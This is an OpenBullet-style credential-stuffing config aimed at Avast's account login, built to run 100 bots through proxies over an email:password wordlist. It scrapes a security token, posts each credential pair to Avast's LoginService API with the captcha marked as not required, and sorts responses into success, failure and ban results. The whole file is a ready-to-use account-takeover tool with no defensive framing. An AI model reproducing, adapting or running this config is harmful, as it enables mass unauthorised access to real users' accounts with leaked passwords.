[SETTINGS]
{
  "Name": "AVAST-henessy",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2019-08-23T10:35:55.1723816+02:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.3.8 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://id.avast.com/?target=https%3A%2F%2Fmy.avast.com%2F#login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<COOKIES>" LR "Token=" "\")}" -> VAR "token" 

REQUEST POST "https://id.avast.com/service/single/LoginService/login?target=https%3A%2F%2Fmy.avast.com%2F" 
  CONTENT "{\"correlationId\":3,\"operationName\":\"login\",\"payload\":[{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"rememberMe\":false,\"captcha_response\":\"NOTREQUIRED\"},{\"allowAuthenticated\":true,\"extraLoginTicket\":false}],\"securityToken\":\"<token>\",\"serviceName\":\"LoginService\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://id.avast.com" 
  HEADER "Referer: https://id.avast.com/?target=https%3A%2F%2Fmy.avast.com%2F" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "redirectTo\":\"https://my.avast.com/" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "success\":true" 
  KEYCHAIN Ban OR 
    KEY "validation.captcha.incorrect" 

